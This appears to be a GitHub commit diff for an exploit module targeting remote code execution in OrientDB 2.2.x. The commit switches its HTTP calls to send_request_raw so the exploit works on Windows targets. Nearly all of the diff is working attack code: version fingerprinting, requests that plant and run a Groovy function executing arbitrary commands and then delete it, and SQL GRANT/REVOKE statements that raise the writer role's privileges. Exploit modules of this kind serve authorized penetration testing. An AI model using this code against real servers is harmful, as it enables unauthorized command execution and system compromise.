Skip to content

Commit 3066492

Browse files
author
Ricardo Almeida
committed
Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting windows boxes
1 parent fe5c6dc commit 3066492

File tree

1 file changed

+8
-13
lines changed

1 file changed

+8
-13
lines changed

modules/exploits/multi/http/orientdb_exec.rb

Lines changed: 8 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@ def initialize(info = {})
5151
def check
5252
uri = target_uri
5353
uri.path = normalize_uri(uri.path)
54-
res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
54+
res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
5555
if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
5656
print_good("Version: #{res.headers['Server']}")
5757
return Exploit::CheckCode::Vulnerable
@@ -67,12 +67,11 @@ def http_send_command(cmd, opts = {})
6767
request_parameters = {
6868
'method' => 'POST',
6969
'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
70-
'encode_params' => false,
7170
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
7271
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
7372
'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
7473
}
75-
res = send_request_cgi(request_parameters)
74+
res = send_request_raw(request_parameters)
7675
if not (res and res.code == 201)
7776
begin
7877
json_body = JSON.parse(res.body)
@@ -85,12 +84,11 @@ def http_send_command(cmd, opts = {})
8584
request_parameters = {
8685
'method' => 'POST',
8786
'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
88-
'encode_params' => false,
8987
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
9088
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
9189
'data' => ""
9290
}
93-
req = send_request_cgi(request_parameters)
91+
req = send_request_raw(request_parameters)
9492
if not (req and req.code == 200)
9593
begin
9694
json_body = JSON.parse(res.body)
@@ -113,12 +111,11 @@ def http_send_command(cmd, opts = {})
113111
request_parameters = {
114112
'method' => 'DELETE',
115113
'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
116-
'encode_params' => false,
117114
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
118115
'headers' => { 'Accept' => '*/*' },
119116
'data' => ""
120117
}
121-
rer = send_request_cgi(request_parameters)
118+
rer = send_request_raw(request_parameters)
122119
if not (rer and rer.code == 204)
123120
begin
124121
json_body = JSON.parse(res.body)
@@ -159,7 +156,7 @@ def execute_command(cmd, opts = {})
159156
vprint_status("Attempting to execute: #{cmd}")
160157
@uri = target_uri
161158
@uri.path = normalize_uri(@uri.path)
162-
res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
159+
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
163160
if res && res.code == 200 && res.body.length > 0
164161
begin
165162
json_body = JSON.parse(res.body)["databases"]
@@ -199,7 +196,7 @@ def linux_stager
199196
def exploit
200197
@uri = target_uri
201198
@uri.path = normalize_uri(@uri.path)
202-
res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
199+
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
203200
if res && res.code == 200 && res.body.length > 0
204201
begin
205202
json_body = JSON.parse(res.body)["databases"]
@@ -221,12 +218,11 @@ def exploit
221218
'method' => 'POST',
222219
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
223220
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
224-
'encode_params' => false,
225221
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
226222
'headers' => { 'Accept' => '*/*' },
227223
'data' => "GRANT #{priv} ON #{item} TO writer"
228224
}
229-
res = send_request_cgi(request_parameters)
225+
res = send_request_raw(request_parameters)
230226
end
231227
end
232228
# Exploit
@@ -249,12 +245,11 @@ def exploit
249245
'method' => 'POST',
250246
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
251247
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
252-
'encode_params' => false,
253248
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
254249
'headers' => { 'Accept' => '*/*' },
255250
'data' => "REVOKE #{priv} ON #{item} FROM writer"
256251
}
257-
res = send_request_cgi(request_parameters)
252+
res = send_request_raw(request_parameters)
258253
end
259254
end
260255
end

0 commit comments

Comments
 (0)